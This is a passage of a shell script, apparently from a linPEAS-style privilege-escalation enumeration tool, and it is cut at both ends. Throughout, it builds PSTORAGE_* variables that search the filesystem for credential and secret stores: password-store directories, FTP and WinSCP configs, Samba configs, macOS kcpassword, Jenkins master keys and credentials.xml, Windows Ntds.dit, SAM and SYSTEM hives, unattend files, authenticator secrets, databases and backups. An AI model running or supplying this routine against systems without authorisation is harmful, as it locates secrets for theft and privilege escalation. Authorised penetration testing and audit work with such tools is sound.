"$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_MEDIA\n$FIND_DIR_SRV\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "\.password-store$" | sort | uniq | head -n 70) - PSTORAGE_FTP=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "vsftpd\.conf$|.*\.ftpconfig$|ffftp\.ini$|ftp\.ini$|ftp\.config$|sites\.ini$|wcx_ftp\.ini$|winscp\.ini$|ws_ftp\.ini$" | sort | uniq | head -n 70) - PSTORAGE_SAMBA=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "smb\.conf$" | sort | uniq | head -n 70) - PSTORAGE_DNS=$(echo -e "$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_MEDIA\n$FIND_DIR_SRV\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}usr|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "bind$" | sort | uniq | head -n 70) - PSTORAGE_SEEDDMS=$(echo -e "$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_MEDIA\n$FIND_DIR_SRV\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "seeddms.*$" | sort | uniq | head -n 70) - PSTORAGE_DDCLIENT=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "ddclient\.conf$" | sort | uniq | head -n 70) - PSTORAGE_KCPASSWORD=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "kcpassword$" | sort | uniq | head -n 70) - PSTORAGE_SENTRY=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_MEDIA\n$FIND_DIR_SRV\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "sentry$|sentry\.conf\.py$" | sort | uniq | head -n 70) - PSTORAGE_STRAPI=$(echo -e "$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_MEDIA\n$FIND_DIR_SRV\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "environments$" | sort | uniq | head -n 70) - PSTORAGE_CACTI=$(echo -e "$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_MEDIA\n$FIND_DIR_SRV\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "cacti$" | sort | uniq | head -n 70) - PSTORAGE_ROUNDCUBE=$(echo -e "$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_MEDIA\n$FIND_DIR_SRV\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "roundcube$" | sort | uniq | head -n 70) - PSTORAGE_PASSBOLT=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "passbolt\.php$" | sort | uniq | head -n 70) - PSTORAGE_JETTY=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "jetty-realm\.properties$" | sort | uniq | head -n 70) - PSTORAGE_JENKINS=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_MEDIA\n$FIND_DIR_SRV\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_CDROM\n$FIND_DIR_SBIN\n$FIND_DIR_CACHE\n$FIND_DIR_MNT\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_ETC\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "master\.key$|hudson\.util\.Secret$|credentials\.xml$|config\.xml$|.*jenkins$" | sort | uniq | head -n 70) - PSTORAGE_WGET=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "\.wgetrc$" | sort | uniq | head -n 70) - PSTORAGE_INTERESTING_LOGS=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "access\.log$|error\.log$" | sort | uniq | head -n 70) - PSTORAGE_OTHER_INTERESTING=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "\.bashrc$|\.google_authenticator$|hosts\.equiv$|\.lesshst$|\.plan$|\.profile$|\.recently-used\.xbel$|\.rhosts$|\.sudo_as_admin_successful$" | sort | uniq | head -n 70) - PSTORAGE_WINDOWS=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E ".*\.rdg$|AppEvent\.Evt$|autounattend\.xml$|ConsoleHost_history\.txt$|FreeSSHDservice\.ini$|NetSetup\.log$|Ntds\.dit$|protecteduserkey\.bin$|RDCMan\.settings$|SAM$|SYSTEM$|SecEvent\.Evt$|appcmd\.exe$|bash\.exe$|datasources\.xml$|default\.sav$|drives\.xml$|groups\.xml$|https-xampp\.conf$|https\.conf$|iis6\.log$|index\.dat$|my\.cnf$|my\.ini$|ntuser\.dat$|pagefile\.sys$|printers\.xml$|recentservers\.xml$|scclient\.exe$|scheduledtasks\.xml$|security\.sav$|server\.xml$|setupinfo$|setupinfo\.bak$|sitemanager\.xml$|sites\.ini$|software$|software\.sav$|sysprep\.inf$|sysprep\.xml$|system\.sav$|unattend\.inf$|unattend\.txt$|unattend\.xml$|unattended\.xml$|wcx_ftp\.ini$|ws_ftp\.ini$|web.*\.config$|winscp\.ini$|wsl\.exe$|plum\.sqlite$" | sort | uniq | head -n 70) - PSTORAGE_DATABASE=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -v -E '/man/|/usr/|/var/cache/|/man/|/usr/|/var/cache/|thumbcache|iconcache|IconCache' | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E ".*\.db$|.*\.sqlite$|.*\.sqlite3$" | sort | uniq | head -n 70) - PSTORAGE_BACKUPS=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E "backup$|backups$" | sort | uniq | head -n 70) - PSTORAGE_PASSWORD_FILES=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E "^${ROOT_FOLDER}media|^${ROOT_FOLDER}.cache|^${ROOT_FOLDER}private|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}tmp|^$GREPHOMESEARCH|^${ROOT_FOLDER}var|^${ROOT_FOLDER}etc" | grep -E ".*password.*$|.*credential.*$|creds.*$|.*\.key$" | sort | uniq | head -n 70) - PSTORAGE_CRONTAB_UI=$(echo -e "$FIND_TMP\n$FIND_ETC\n$FIND_SYS\n$FIND_MNT\n$FIND_LIB64\n$FIND_CONCOURSE_AUTH\n$FIND_CACHE\n$FIND_SRV\n$FIND_HOMESEARCH\n$FIND_SYSTEM\n$FIND_LIB32\n$FIND_LIB\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_CONCOURSE_KEYS\n$FIND_RUN\n$FIND_BIN\n$FIND_OPT\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_MEDIA\n$FIND_SBIN\n$FIND_PRIVATE\n$FIND_CDROM\n$FIND_VAR\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E 